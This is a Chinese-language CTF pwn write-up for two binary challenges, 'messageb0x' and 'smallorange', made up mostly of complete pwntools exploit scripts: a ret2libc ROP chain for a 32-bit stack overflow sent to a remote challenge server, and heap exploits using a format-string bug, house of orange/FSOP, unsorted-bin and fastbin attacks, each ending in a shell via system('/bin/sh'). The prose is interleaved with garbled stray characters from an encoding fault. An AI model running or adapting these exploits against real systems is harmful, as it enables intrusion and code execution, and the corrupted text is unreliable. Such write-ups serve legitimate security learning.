題目鏈接

messageb0x

• 教科書般的32位棧溢出(不懂得可以看一步一步學(xué)rop 32位)，首先rop利用puts函數(shù)泄漏puts真實地址得到libc基址玻募，然后得到system地址盯桦，/bin/sh地址再rop到有溢出地方執(zhí)行system('/bin/sh\x00')

exp:

from pwn import *

context.log_level = 'debug'

#p = process('./messageb0x')
p = remote('101.71.29.5',10000)

def stack_overflow(payload):
    p.recvuntil(' are:\n')
    p.sendline('1')
    p.recvuntil('address:\n')
    p.sendline('1')
    p.recvuntil('say:\n')
    p.sendline(payload)

elf = ELF('./messageb0x')

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']


payload = 'a'*0x58 + 'bbbb' 
payload += p32(puts_plt) + p32(0x0804923B)
payload += p32(puts_got)
stack_overflow(payload)

p.recvuntil('you !\n')
puts_addr = u32(p.recv(4))
log.success('puts addr : 0x%x'%puts_addr)
# offset_puts = 0x0005fca0
# offset_system = 0x0003ada0
# offset_str_bin_sh = 0x15ba0b
offset_puts = 0x0005f140
offset_system = 0x0003a940
offset_str_bin_sh = 0x15902b
libc_base = puts_addr - offset_puts
log.success('libc addr : 0x%x'%libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh

payload = 'a'*0x58 + 'bbbb'
payload += p32(system_addr) + p32(0xdeadbeef)
payload += p32(binsh_addr)
stack_overflow(payload)

p.interactive()

smallorange

• 這題感覺質(zhì)量挺好的通殃，讓我學(xué)到了挺多騷操作的包括house_of_orange咱枉，一開始發(fā)現(xiàn)程序有個edit函數(shù)但是沒有被調(diào)用冤灾，還以為作者搞錯了(233333)玛臂，然后程序還有個格式化字符串漏洞烤蜕，數(shù)組下界溢出(這題并沒有利用到)

• 預(yù)期解(直接copy官方的wp):

1. 通過格式化字符串漏洞修改控制輸入堆塊數(shù)據(jù)大小的size變量，從而為后續(xù)構(gòu)造堆溢出迹冤，并泄露棧地址玖绿。
2. 通過之前構(gòu)造的size，可以觸發(fā)堆溢出叁巨，但是由于題目邏輯限制斑匪，無法直接達(dá)到任意地址寫。只能使用the house of orange(這里的demo寫的很清晰)進(jìn)行攻擊锋勺。
3. 由于題目沒有信息泄露的地方蚀瘸，唯一知道的是程序運行開始時打印的堆地址和泄露的棧地址，無法獲得lib庫加載的基地址庶橱，但是_IO_list_all變量與malloc 使用area變量相近贮勃，根據(jù)_IO_list_all變量的在lib庫的偏移可以大致確定其加載地址，通過覆蓋unsorted bin的bk的兩個字節(jié)苏章，這樣會有十六分之一的幾率將bk覆蓋為_IO_list_all-0x10,從而利用the house of orange 劫持控制流寂嘉。
4. 劫持控制流后奏瞬，由于無法獲得system地址，則通過將rip設(shè)為edit函數(shù)泉孩，并將其參數(shù)設(shè)為棧地址硼端，這樣可以向棧中寫入rop連，通過rop泄露puts函數(shù)地址寓搬，計算system地址珍昨，改atoi_got為system執(zhí)行system('/bin/sh\x00')

exp1(本地關(guān)了aslr):

from pwn import *

context.log_level = 'debug'

p = process(argv=['./smallorange','a'*0x1000])
#p = process('./smallorange',env={'123'*0x1000:'a'*0x1000})

def new(data):
    p.recvuntil('choice: ')
    p.sendline('1')
    p.recvuntil('text:\n')
    p.send(data)

def out(index):
    p.recvuntil('choice: ')
    p.sendline('2')
    p.recvuntil('index:\n')
    p.sendline(str(index))

#use fmt change size to heapoverflow and leak stack_addr
p.recvuntil('ourselves\n')
p.send('a'*34 + 'a%19$n')
p.recvuntil('a'*35)
leak_stack = u64(p.recv(6).ljust(8,'\x00'))
p.recvuntil('addr:')
leak_heap = int(p.recvuntil('\n',drop=True),16)
log.success('leak stack addr : 0x%x'%leak_stack)
log.success('leak heap addr : 0x%x'%leak_heap)

#FSOP -> edit(stack_addr)
system_addr = 0x7ffff7a52390
edit_addr = 0x400B59
new('aaaa') #0
#fake _IO_FILE
fake_IO_file =  p64(0)*2 + p64(2) + p64(3) + p64(0)*9 
fake_IO_file += p64(edit_addr)
fake_IO_file += p64(0)*11 + p64(leak_heap+0x270)
new(fake_IO_file) #1
new('cccc') #2
out(0)
out(1)
fake_unsorted_bin = 'a'*0x100 + p64(leak_stack-0x569) + p64(0x61)
fake_unsorted_bin += 'a'*8 + '\x10\x25'
new(fake_unsorted_bin) #3
p.recvuntil('choice: ')
p.sendline('1')

#rop -> write(1,puts_got,8) -> read(0,atoi_got,8) -> getnum
p.recvuntil('index:\n')
elf = ELF('./smallorange')
write_got = elf.got['write']
puts_got = elf.got['puts']
read_got = elf.got['read']
atoi_got = elf.got['atoi']
p6_ret = 0x400C9A
mov_call = 0x400C80
payload = 'a'*48 + p64(p6_ret)
payload += p64(0) + p64(1) + p64(write_got) + p64(0x8) + p64(puts_got) + p64(1)
payload += p64(mov_call) + 'aaaaaaaa'
payload += p64(0) + p64(1) + p64(read_got) + p64(0x8) + p64(atoi_got) + p64(0)
payload += p64(mov_call) + 'a'*56 + p64(0x400AEA)
p.sendline(payload)


#leak libc
puts_addr = u64(p.recv(8))
log.success('puts addr : 0x%x'%puts_addr)
offset_puts = 0x000000000006f690
offset_system = 0x0000000000045390
libc_base = puts_addr - offset_puts
system_addr = libc_base + offset_system
log.success('system addr : 0x%x'%system_addr)

#system('/bin/sh\x00')
p.send(p64(system_addr))
p.recvuntil('index:\n')
p.sendline('/bin/sh\x00')
p.interactive()

• 非預(yù)期解(感謝veritas501師傅提供的思路以及耐心解答我的一些問題)：

1. 通過格式化字符串漏洞修改控制輸入堆塊數(shù)據(jù)大小的size變量，從而為后續(xù)構(gòu)造堆溢出句喷，并泄露棧地址镣典。
2. 利用堆溢出，由于unsorted bin中bk指針是main_arena+0x58的地址唾琼，與global_max_fast只差2字節(jié)兄春，所以利用unsorted bin attack來修改global_max_fast
3. 然后利用out函數(shù)的getnum在棧上fake fastbin，然后alloc to stack锡溯，進(jìn)而stack overflow
4. rop泄漏libc然后改atoi函數(shù)為system赶舆，跳轉(zhuǎn)到getnum函數(shù)執(zhí)行system('/bin/sh\x00')

有些細(xì)節(jié)需要注意：

1. 由于read函數(shù)的size太大，到達(dá)棧底趾唱，所以我們運行程序的時候需要加點argv或者env來擴(kuò)大棧
2. getnum函數(shù)的stack_chk_fail并沒有被執(zhí)行所以我們才能stack overflow

3. 由于改了global_max_fast后一般只能用fastbin，所以一般改之前free幾個堆塊進(jìn)fastbin里方便后面malloc

exp2(本地關(guān)了aslr):

from pwn import *

context.log_level = 'debug'

p = process(argv=['./smallorange','a'*0x1000])
#p = process('./smallorange',env={'123'*0x1000:'a'*0x1000})

def new(data):
    p.recvuntil('choice: ')
    p.sendline('1')
    p.recvuntil('text:\n')
    p.send(data)

def out(index):
    p.recvuntil('choice: ')
    p.sendline('2')
    p.recvuntil('index:\n')
    p.sendline(str(index))

#use fmt change size to heapoverflow and leak stack_addr
p.recvuntil('ourselves\n')
p.send('a'*34 + 'a%19$n')
p.recvuntil('a'*35)
leak_stack = u64(p.recv(6).ljust(8,'\x00'))
p.recvuntil('addr:')
leak_heap = int(p.recvuntil('\n',drop=True),16)
log.success('leak stack addr : 0x%x'%leak_stack)
log.success('leak heap addr : 0x%x'%leak_heap)

#unsorted bin attack to hijack global_max_fast
new('aaaa') #0
new('bbbb') #1
new('cccc') #2
new('1') #3
new('2') #4
new('3') #5
out(0)
out(1)
fake_unsorted_bin = 'a'*0x100 + p64(0x110) + p64(0x111)
fake_unsorted_bin += 'a'*0x8 + '\xe8\x37'
new(fake_unsorted_bin) #6
new('dddd') #7

#fastbin attack to alloc to Stack
fake_chunk_ptr = leak_stack - 89 - 0x8
log.success('fake_chunk_ptr : 0x%x'%fake_chunk_ptr)
out(4)
out(3)
payload = 'a'*0x100 + p64(0) + p64(0x111)
payload += p64(fake_chunk_ptr)
new(payload)
new('eeee')
#fake chunk on stack
out(p64(0x111))
#rop 
elf = ELF('./smallorange')
write_got = elf.got['write']
puts_got = elf.got['puts']
read_got = elf.got['read']
atoi_got = elf.got['atoi']
p6_ret = 0x400C9A
mov_call = 0x400C80
payload = 'p'*0x10 + p64(p6_ret)
payload += p64(0) + p64(1) + p64(write_got) + p64(0x8) + p64(puts_got) + p64(1)
payload += p64(mov_call) + 'aaaaaaaa'
payload += p64(0) + p64(1) + p64(read_got) + p64(0x8) + p64(atoi_got) + p64(0)
payload += p64(mov_call) + 'a'*56 + p64(0x400AEA)
new(payload)

#leak libc
puts_addr = u64(p.recv(8))
log.success('puts addr : 0x%x'%puts_addr)
offset_puts = 0x000000000006f690
offset_system = 0x0000000000045390
libc_base = puts_addr - offset_puts
system_addr = libc_base + offset_system
log.success('system addr : 0x%x'%system_addr)

#system('/bin/sh\x00')
p.send(p64(system_addr))
p.recvuntil('index:\n')
p.sendline('/bin/sh\x00')


p.interactive()

house of orange相關(guān)文章：

• https://veritas501.space/2017/12/13/IO%20FILE%20%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/
• https://bbs.pediy.com/thread-222718.htm
• http://tacxingxing.com/2018/01/10/house-of-orange/